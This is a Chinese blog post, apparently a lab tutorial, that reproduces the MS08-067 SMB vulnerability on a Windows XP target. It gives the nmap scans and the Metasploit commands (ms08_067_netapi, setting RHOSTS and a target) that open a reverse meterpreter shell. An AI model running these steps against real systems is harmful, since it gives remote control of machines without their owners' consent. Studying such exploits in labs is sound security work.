其他分享
首页 > 其他分享> > MS08_067漏洞复现

MS08_067漏洞复现

作者:互联网

原理

攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机

环境准备

攻击机kali 192.168.182.130
靶机 windows xp 中文版 192.168.182.129

靶机关闭防火墙,靶机需要在攻击机的网段中

端口扫描

使用nmap探测ip网段上存活的主机及开放的端口

nmap -sV -n 192.168.182.0/24

在这里插入图片描述
查看是否存在ms08_067漏洞

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.182.129 --open

在这里插入图片描述

漏洞复现

启动msfconsole

msfconsole

在这里插入图片描述
搜索ms08_067选择攻击模块

search ms08_067

在这里插入图片描述
use调用模块

use exploit/windows/smb/ms08_067_netapi

show options 查看该模块需要配置的参数

show options

yes表示需要配置的参数,RPORT,SMBPIPE已经默认配置好了,只需要配置RHOSTS
在这里插入图片描述配置RHOSTS,设置为靶机地址

set RHOSTS 192.168.182.129

msf6 Payload 攻击载荷模块已经默认设置好了不需要再设置lhost,LHOST表示回连地址,LPORT端口
在这里插入图片描述
设置target,靶机的系统版本

show targets

我的靶机是xp sp3 中文版
在这里插入图片描述设置为target34 windows xp3 中文版

set target 34

在这里插入图片描述
run 运行即可反弹shell,反弹一个meterpreter代表攻击成功

run

在这里插入图片描述

标签:067,show,端口,192.168,ms08,复现,MS08,靶机
来源: https://blog.csdn.net/weixin_45291045/article/details/116834151